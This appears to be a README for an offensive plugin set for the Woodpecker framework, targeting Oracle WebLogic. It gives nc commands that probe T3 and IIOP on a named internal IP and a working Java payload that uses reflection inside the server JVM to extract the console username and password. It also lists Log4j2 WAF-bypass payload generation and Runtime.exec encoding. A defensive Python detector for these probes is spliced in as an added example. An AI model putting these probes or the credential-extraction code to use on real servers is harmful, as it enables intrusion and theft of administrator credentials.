RASSec / woodpecker-plugins


woodpecker-plugins usage

Copy the plugins into the woodpecker-framework/plugin directory, then start the framework with `java -jar woodpecker-framework.1.3.3.jar`.

Framework and plugin source: https://github.com/woodpecker-appstore

weblogic-info


Check whether T3 is open:

```
echo 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'|nc 10.20.31.189 7001
```

Check whether IIOP is open:

```
echo "GIOP\x01\x02\x00\x03\x00\x00\x00\x17\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0bNameService"| nc 10.20.31.189 7001
```
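The two probes above are exactly the first client bytes a WebLogic listener sees when T3 or IIOP is reachable. As an added example that is not part of the plugin, the following Python parses a first-packet payload captured on a WebLogic port into T3 handshake fields or GIOP header fields, so a network sensor can flag unexpected T3/IIOP clients; the sample payloads are constructed to mirror the two commands.

```python
import re
import struct

# Constructed sample payloads mirroring the two probe commands above.
T3_SAMPLE = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
GIOP_SAMPLE = (b"GIOP\x01\x02\x00\x03\x00\x00\x00\x17"
               b"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0bNameService")

# GIOP message types per the CORBA GIOP spec (byte 7 of the 12-byte header).
GIOP_MSG_TYPES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
                  4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}


def parse_t3_handshake(payload: bytes):
    """Return the T3 hello fields (version, AS, HL, MS, PU ...) or None if not T3."""
    m = re.match(rb"t3s? (\d+(?:\.\d+)*)\n", payload)
    if not m:
        return None
    fields = {"version": m.group(1).decode()}
    for line in payload[m.end():].split(b"\n"):
        if not line:          # a blank line terminates the header block
            break
        key, _, value = line.partition(b":")
        fields[key.decode()] = value.decode(errors="replace")
    return fields


def parse_giop_header(payload: bytes):
    """Return the fixed 12-byte GIOP header fields, or None if not GIOP."""
    if len(payload) < 12 or payload[:4] != b"GIOP":
        return None
    major, minor, flags, msg_type = struct.unpack("BBBB", payload[4:8])
    little_endian = bool(flags & 0x01)   # bit 0 of the flags byte is the byte order
    (body_len,) = struct.unpack("<I" if little_endian else ">I", payload[8:12])
    return {"version": f"{major}.{minor}", "little_endian": little_endian,
            "msg_type": GIOP_MSG_TYPES.get(msg_type, f"unknown({msg_type})"),
            "body_len": body_len, "body_complete": len(payload) - 12 >= body_len}


def classify_probe(payload: bytes) -> str:
    """Label the first client bytes seen on a WebLogic listen port."""
    if parse_t3_handshake(payload):
        return "t3-handshake"
    if parse_giop_header(payload):
        return "giop-request"
    return "other"
```

Anything other than HTTP arriving on a port that should only serve the console is a signal worth alerting on; WebLogic itself can also block the T3/IIOP handshakes at the listener with a connection filter.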

WebLogic console weak password

https://twitter.com/jas502n/status/1467122190760177664?s=20

Use the T3 protocol to get the WebLogic console username and password:

```java
import java.lang.reflect.Field;
import java.lang.reflect.Method;

    // Runs inside the WebLogic server JVM; the WebLogic classes are resolved by name
    // through the context class loader, so nothing WebLogic-specific is needed at compile time.
    public static String getPass() {
        try {
            ClassLoader l = Thread.currentThread().getContextClassLoader();
            Class HttpDataTransferHandler = l.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler");
            Class ManagementService = l.loadClass("weblogic.management.provider.ManagementService");
            Class AuthenticatedSubject = l.loadClass("weblogic.security.acl.internal.AuthenticatedSubject");
            Class PropertyService = l.loadClass("weblogic.management.provider.PropertyService");
            // Kernel identity subject used to obtain the PropertyService
            Field f = HttpDataTransferHandler.getDeclaredField("KERNE_ID");
            f.setAccessible(true);
            Method mm = ManagementService.getMethod("getPropertyService", AuthenticatedSubject);
            mm.setAccessible(true);
            Object prop = mm.invoke((Object) null, f.get((Object) null));
            Method m1 = PropertyService.getMethod("getTimestamp1");
            Method m2 = PropertyService.getMethod("getTimestamp2");
            m1.setAccessible(true);
            m2.setAccessible(true);
            String name = (String) m1.invoke(prop);
            String pass = (String) m2.invoke(prop);
            return "name:" + name + ",pass:" + pass + ";";
        } catch (Exception e) {
            // Return the exception text so the caller sees why lookup failed
            return e.toString();
        }
    }
```

Spring Boot API scan

Log4j2 WAF-bypass payload generation

Class to BCEL code

Java Runtime.exec encoding

http://jackson-t.ca/runtime-exec-payloads.html
